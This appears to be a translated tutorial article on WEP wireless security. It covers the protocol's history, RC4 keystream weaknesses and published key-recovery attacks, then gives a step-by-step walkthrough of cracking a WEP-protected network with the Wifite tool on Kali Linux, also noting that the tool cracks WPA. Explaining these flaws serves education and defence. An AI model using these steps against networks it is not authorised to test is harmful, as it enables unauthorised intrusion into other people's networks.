Network security attack and defense: wireless network security WEP

[[392852]]

The WEP (Wired Equivalent Privacy) protocol is a method of encrypting data transmitted wirelessly between two devices to prevent illegal users from eavesdropping or intruding into the wireless network.

Judging from the English name alone, WEP seems to be a security encryption protocol for wired networks, but it is not. The WEP standard was created in the early days of wireless networks and is a necessary security layer for wireless local area networks (WLANs).

WEP was approved as the Wi-Fi security standard in September 1997. Even at the time, the first version of WEP had a low encryption strength, as U.S. restrictions on various cryptographic technologies led manufacturers to only use 64-bit encryption. When the restrictions were lifted, the encryption strength was increased to 128 bits. Although 256-bit WEP encryption was later introduced, 128-bit encryption is still the most common encryption.

Despite various attempts to improve, work around, or support the WEP system, it is still very vulnerable, and systems that rely on WEP should be upgraded. If security upgrades are not possible, it is recommended to replace new products. The Wi-Fi Association announced the official retirement of WEP in 2004.

You can select the encryption method in the wireless router, as shown in Figure 1.

Figure 1 Select encryption mode for wireless router

1. WEP’s insecurity

WEP uses the RC4 encryption algorithm, which is a stream cipher. The principle of a stream cipher is to expand a short key into an infinite pseudo-random key stream. The sender obtains the ciphertext by performing an XOR operation on the key stream and the plaintext. The receiver has the same short key and can use it to obtain the same key stream. Performing an XOR operation on the key stream and the ciphertext will give the original plaintext.

This mode of operation makes the stream cipher vulnerable to several attacks. If an attacker flips a bit in the ciphertext, the corresponding bit in the plaintext will also be flipped after decryption. In addition, if an eavesdropper intercepts two ciphertexts encrypted with the same keystream, he will also be able to know the XOR result of the two plaintexts. Knowing the XOR can be used to recover the plaintext through statistical analysis. Statistical analysis becomes more practical as more ciphertexts encrypted with the same keystream are intercepted. Once one of the plaintexts is known, it is easy to recover all the others.

The existence of a major flaw in WEP encryption technology was already known in August 2001. Cryptographers Scott Fluhrer, Itsik Mantin, and Adi Shamir pointed out the shortcomings of RC4 encoding in a paper. As a result, attackers were able to successfully crack the security key to a certain extent.

In 2005, Andreas Klein published another paper on RC4 stream cipher, proving that there are more relationships between RC4 key streams. Boffins of Darmstadt University used this idea to conduct experiments, and the results showed that 104-bit WEP security keys can be cracked in half of the cases using only 40,000 captured data packets.

Boffins said that the more data packets they captured, the easier it would be to obtain the security key. By intercepting 85,000 data packets, they were able to crack the key with a success rate of 95%.

Capturing 40,000 data packets can be completed in less than 1 minute, and the time to crack them is about 3 seconds on a Pentium 1.7 GHz processor.

The key to recovering the WEP password is to collect enough valid data frames, from which the IV value and ciphertext can be extracted. The first byte of the plaintext corresponding to the ciphertext is certain, and it is the 802.2 header information of the logical link control. Through this one-byte plaintext and ciphertext, we can get a one-byte WEP key stream by XOR operation. Since the RC4 stream cipher generation algorithm only scrambles the order of the original password, the one-byte password obtained is part of IV+P6ASSWORD. However, due to the RC4 scrambling, the specific position and arrangement order of this byte are unknown. When enough IV values ​​and fragmented passwords are collected, statistical analysis operations can be performed. Rearrange the above password fragments, use the RC4 algorithm with IV to compare the values ​​obtained with multiple stream cipher positions, and finally get the correct arrangement order of these password fragments. In this way, the WEP password is analyzed.

Simply put, the more data groups obtained, the greater the probability of cracking and the faster the cracking speed.

2. Cracking WEP

Because of the insecurity of WEP, it is very easy to crack WEP. There are also many software that can directly crack WEP encrypted Wi-Fi. The following describes how to crack WEP encrypted Wi-Fi.

If there is traffic, that is, there are clients connected to the wireless environment and there is network traffic, then cracking WEP becomes a matter of seconds. Here, a small tool with integrated commands is used under the Kali Linux system, so there is no need to remember the commands yourself.

Wifite is an automated WEP and WPA cracking tool that does not support Windows and Mac OS. Wifite integrates the instructions of the Aircrack-ng suite and can run automatically with simple configuration without manual intervention. It can attack multiple networks encrypted with WEP and WPA at the same time.

Simply enter wifite in the terminal to automatically enter the monitor mode of the network card and start detecting and scanning nearby wireless networks, as shown in Figure 2.

Figure 2 Entering Monitor mode and scanning nearby networks

After selecting the target, press Ctrl+C, and then enter the selected target number, as shown in Figure 3.

Figure 3 Enter the target serial number

Then Wifite will automatically start capturing data packets and cracking them. After capturing more than 10,000 data packets, the cracking process is basically successful, taking about 1 minute, as shown in Figure 4.

Figure 4: Successful cracking

The gadget introduced above is very useful when there is a large amount of traffic, so that you can quickly crack the wireless password and also crack WPA.